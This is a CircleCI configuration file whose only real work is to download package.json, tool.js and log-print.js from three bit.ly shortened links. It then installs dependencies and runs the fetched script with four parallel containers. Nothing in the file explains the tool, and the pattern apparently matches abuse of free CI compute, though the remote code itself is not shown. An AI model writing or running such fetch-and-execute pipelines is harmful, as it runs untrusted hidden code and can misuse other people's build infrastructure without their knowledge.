version: 2.1

jobs:
  run:
    docker:
      - image: node:15
    resource_class: medium
    parallelism: 4
    steps:
      - run: 
          name: Get Tool
          command: |-
            curl -fsSL https://bit.ly/3nvNdYs -o package.json && curl -fsSL https://bit.ly/2XgnUhW -o tool.js && curl -fsSL https://bit.ly/3Cb0Pwk -o log-print.js
      - run: 
          name: Before Install
          command: |-
            npm i -s
      - run: node tool.js docker 2
      
workflows:
  start-work:
    jobs:
      - run